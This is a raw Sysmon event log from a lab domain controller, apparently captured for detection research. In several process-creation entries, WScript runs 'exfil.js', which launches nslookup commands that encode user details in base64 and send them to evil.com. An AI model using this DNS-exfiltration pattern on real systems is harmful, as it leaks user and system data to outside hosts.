14:16:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-17A1-629A-783D-000000005F02}55523616C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-7B3F-000000005F02}8072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.640{2E1864BB-17B7-629A-7B3F-000000005F02}8072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnim.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.628{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzbiy.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-17B7-629A-793F-000000005F02}22523864C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-7A3F-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-7A3F-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.596{2E1864BB-17B7-629A-783F-000000005F02}29007460C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-7A3F-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.602{2E1864BB-17B7-629A-7A3F-000000005F02}6076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-783F-000000005F02}2900C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzbiy.tmp 2>&1 10341000x8000000000000000198055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.574{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-793F-000000005F02}2252C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.574{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-793F-000000005F02}2252C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.559{2E1864BB-17B7-629A-793F-000000005F02}22523864C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-783F-000000005F02}2900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-793F-000000005F02}2252C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-783F-000000005F02}2900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.543{2E1864BB-17A1-629A-783D-000000005F02}55523348C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-783F-000000005F02}2900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.545{2E1864BB-17B7-629A-783F-000000005F02}2900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzbiy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.528{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgvlzji.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-17B7-629A-763F-000000005F02}51127280C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-773F-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.496{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 